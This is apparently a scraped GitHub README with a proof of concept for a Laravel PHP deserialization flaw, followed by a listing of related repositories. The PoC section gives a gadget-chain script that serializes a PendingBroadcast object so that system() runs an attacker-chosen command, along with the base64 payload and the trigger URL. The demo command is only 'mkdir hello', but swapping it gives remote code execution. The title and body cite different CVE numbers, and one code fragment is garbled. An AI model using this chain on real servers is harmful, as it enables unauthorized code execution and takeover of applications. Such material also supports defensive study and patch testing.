Case for CVE-2022-30778

Overview

Override

This is Abount CVE-2021-43503.

Requirement

  • PHP >= 8.0
  • Composer

Recover vulnerability

1. Startup service

composer install
cp .env.example .env
php artisan key:generate
php artisan serve # it will listening 8000 port in localhost

2. PoC

event = new BroadcastEvent(); $this->event->connection = "mkdir hello"; $this->events = new \Illuminate\Bus\Dispatcher(); } } } namespace{ $a = new \Illuminate\Broadcasting\PendingBroadcast(); echo base64_encode(serialize($a)); }">

namespace Illuminate\Contracts\Queue{
    interface ShouldQueue
    {
        //
    }
}

namespace Illuminate\Bus{
    class Dispatcher{
        protected $container;
        protected $pipeline;
        protected $pipes = [];
        protected $handlers = [];
        protected $queueResolver;
        function __construct()
        {
            $this->queueResolver = "system";

        }
    }
}

namespace Illuminate\Broadcasting{

    use Illuminate\Contracts\Queue\ShouldQueue;

    class BroadcastEvent implements ShouldQueue {
        function __construct()
        {

        }
    }

    class PendingBroadcast{
        protected $events;
        protected $event;
        function __construct()
        {
            $this->event = new BroadcastEvent();
            $this->event->connection = "mkdir hello";
            $this->events = new \Illuminate\Bus\Dispatcher();
        }
    }
}
namespace{
    $a = new \Illuminate\Broadcasting\PendingBroadcast();
    echo base64_encode(serialize($a));
}

It will be output above:

Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czoxMToibWtkaXIgaGVsbG8iO319

3. Test from GET of HTTP:

Access the http://localhost:8000/?ser=Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czoxMToibWtkaXIgaGVsbG8iO319 through the browser.

Access exp case

It did successfully create hello/ in public/

You might also like...
Test case to reproduce a PHP segmentation fault involving Xdebug, streams, and dates

The code in this repository causes a segmentation fault when run with PHP 8.0.6 on Fedora 33. This issue was originally reported to the Xdebug project

Demo of automated testing use cases for the 2022 nationals
Demo of automated testing use cases for the 2022 nationals

Tests automatisés aux finales nationales 2022 Test d'API (Module C2) Pour le module C2, les spécifications de l'API seront fournies dans la spécificat

2022 edition of the inRage Theme fully based on Gutenberg with the support of Roots Sage 10
2022 edition of the inRage Theme fully based on Gutenberg with the support of Roots Sage 10

2022 Edition - inRage theme This version of the theme is compatible with the Full site editing of Wordpress 5.8/5.9 and use Sage 10 in order to manage

Projet Jura2021-2022

CodeIgniter 4 Framework What is CodeIgniter? CodeIgniter is a PHP full-stack web framework that is light, fast, flexible, and secure. More information

Mailing Microservice - My solution for Moroccan PHPers's February 2022 Challenge
Mailing Microservice - My solution for Moroccan PHPers's February 2022 Challenge

Mailing Microservice Solution for Moroccan PHPers's February 2022 Challenge by Rabyâ Raghib ([email protected]). It mainly consists of: a php app th

A&D challenge for AIS3 EOF CTF 2022 Final.

A&D challenge for AIS3 EOF CTF 2022 Final.

Queue Management Systems for LPG vendor agencies of Sri Lanka, for the LPG shortages in 2022

gas-queue-mgt Queue Management Systems for LPG vendor agencies of Sri Lanka, for the LPG shortages in 2022 Installation Requirements PHP 7.4 or later

Trabajo final de la materia Bases de Datos 1. Creación de una base de datos con MySQL y desarrollo de una página web con PHP para manipularla. UNAL sede Medellín, semestre 2022-1.

Trabajo final BD: i-Lunch Materia: Bases de Datos I Profesor: Francisco Javier Moreno Arboleda Institución: Universidad Nacional de Colombia sede Mede

Repositorio del código fuente utilizado en la página web Lifo.es durante los años 2017 a 2022
Repositorio del código fuente utilizado en la página web Lifo.es durante los años 2017 a 2022

Lifo.es Código fuente del juego de rol online Lifo modificado por mi (Sora) durante los años 2017 a 2022. Este código es una modificación del código b

Demo Silverstripe and JavaScript sources for Lightning Talk
Demo Silverstripe and JavaScript sources for Lightning Talk "FormField Mini Apps" at StripeCon EU 2022

Watch the Lightning Talk on Youtube 📺 Demo repository for Lightning Talk "FormField Mini Apps with the JavaScript framework/lib/style of your choice"

Owner
kang
kang
Major Security Vulnerability on PrestaShop Websites - CVE-2022-31101

Fix Major Security Vulnerability on PrestaShop Websites ?? CVE-2022-31101 detector and fixer! A newly found exploit could allow remote attackers to ta

Mathias Reker ⚡️ 25 Nov 22, 2022
CVE-2022-29221 Proof of Concept Code

CVE-2022-29221-PoC This is a very basic Smarty sceleton app with a single template that shows the Proof of Concept code for CVE-2022-29221. Injection

S Bani 12 Nov 4, 2022
Log4j RCE - (CVE-2021-44228)

Log4j-RCE Log4j RCE - (CVE-2021-44228) How To Run? php log4j.php https://1337.com Requirements PHP CURL PAYLOAD DNS LOG (Collaborator Burpsuite or use

Fadhli Almunawar 8 Sep 25, 2022
A platform for CMS version detection, exploit suggestion and CVE display based on vulnerability

A platform for CMS version detection, exploit suggestion and CVE display based on vulnerability

HawkstoNGriM 3 Jul 7, 2022
cve-2021-38314 - Unauthenticated Sensitive Information Disclosure

cve-2021-38314 - Unauthenticated Sensitive Information Disclosure The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress regi

Tri Wanda Septian 2 May 15, 2022
Generally, a graceful shutdown is preferable in the case of any OS that saves its state

Graceful Shutdown with PHP Generally, a graceful shutdown is preferable in the case of any OS that saves its state.

Leonardo Carmo 17 Oct 14, 2022
Kaiju is an open source verification bot based on Discord's OAuth written in C# and PHP, with the functionality of being able to integrate the user to a new server in case yours is suspended.

What is Kaiju? Kaiju is an open source verification bot for Discord servers, based on OAuth and with permission for the server owner, to be able to mi

in the space 10 Nov 20, 2022
Enhancement to Magento to allow simple product prices to be used instead of the default special-case configurable product prices

Simple Configurable Products Extension For Magento This documentation applies to SCP versions 0.7 onwards. The documentation for SCP v0.6 and earlier

Simon King 288 Nov 7, 2022
Laravel Eloquent CASE Statement Support

This packages adds CASE statement support to Laravel Query Builder. It supports Laravel 8.x & 9.x.

Agli Pançi 87 Jan 2, 2023
QaraTMS is open source test case, test suites, test plans and test runs management tool.

QaraTMS - Open Source Test Management System QaraTMS is open source test management software for managing test suites, test cases, test plans, test ru

Alex H 29 Dec 22, 2022